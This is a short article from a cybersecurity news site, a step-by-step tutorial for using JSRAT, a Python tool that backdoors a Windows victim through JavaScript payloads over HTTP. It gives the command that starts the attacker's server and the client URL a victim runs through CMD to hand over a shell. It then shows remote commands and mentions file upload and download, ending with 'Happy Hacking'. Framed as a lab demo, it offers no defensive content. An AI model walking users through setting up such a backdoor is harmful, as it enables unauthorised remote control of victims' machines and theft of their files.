Wednesday, March 26, 2025
HomeBackdoorJSRAT - Secret Command & Control Channel Backdoor to Control Victims Machine...

JSRAT – Secret Command & Control Channel Backdoor to Control Victims Machine Using JavaScript

Published on

SIEM as a Service

Follow Us on Google News

JsRat is python based script developed to backdoor victim machine using JavaScript payloads and the HTTP protocol for communication between the server and the target hosts.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

Installation & Setup :-

  • Download the JSRAT tool Here
  • Download and give appropriate permission to execute the script.Above figure shows the complete installation

Starting the web server:

  • Run and execute the command: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080
  • JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf

VICTIM MACHINE:-

  • Open this Client command URL with Victim browser
  • To gain the shell payload generated by URL should be opened with CMD.
  • Once the command is executed a shell will be obtained.

BACK TO ATTACKERS MACHINE WITH BACKDOOR:-

  • Here we go !!! We have connected with the Victim machine
  • Let us try some windows command: Ipconfig
JSRAT
  • The above Figure shows executing the command calc opens up the Windows calculator.JSRat can also provide upload, Read and Download files. Happy Hacking !!!

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Latest articles

Threat Actors Use “Atlantis AIO” Tool to Automate Credential Stuffing Attacks

In a concerning development for cybersecurity professionals, threat actors are increasingly utilizing a powerful...

Hackers Exploit COM Objects for Fileless Malware and Lateral Movement

Security researchers Dylan Tran and Jimmy Bayne have unveiled a new fileless lateral movement...

B1ack’s Stash Marketplace Actors Set to Release 4 Million Stolen Credit Card Records for Free

In a significant escalation of illicit activities, B1ack’s Stash, a notorious dark web carding...

Pakistan APT Hackers Weaponize malicious IndiaPost Site to Target Windows and Android Users

A Pakistan-based Advanced Persistent Threat (APT) group, likely APT36, has launched a multi-platform cyberattack...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Google Launches Open-Source OSV-Scanner for Detecting Security Vulnerabilities

Google has announced the launch of OSV-Scanner V2, an open-source tool designed to enhance vulnerability...

New Microsoft Windows GUI 0-Day Vulnerability Actively Exploited in the Wild

A newly discovered vulnerability in Microsoft Windows, identified by ClearSky Cyber Security, is reportedly...

Fortinet FortiOS & FortiProxy Zero-Day Exploited to Hijack Firewall & Gain Super Admin Access

Cybersecurity firm Fortinet has issued an urgent warning regarding a newly discovered zero-day authentication...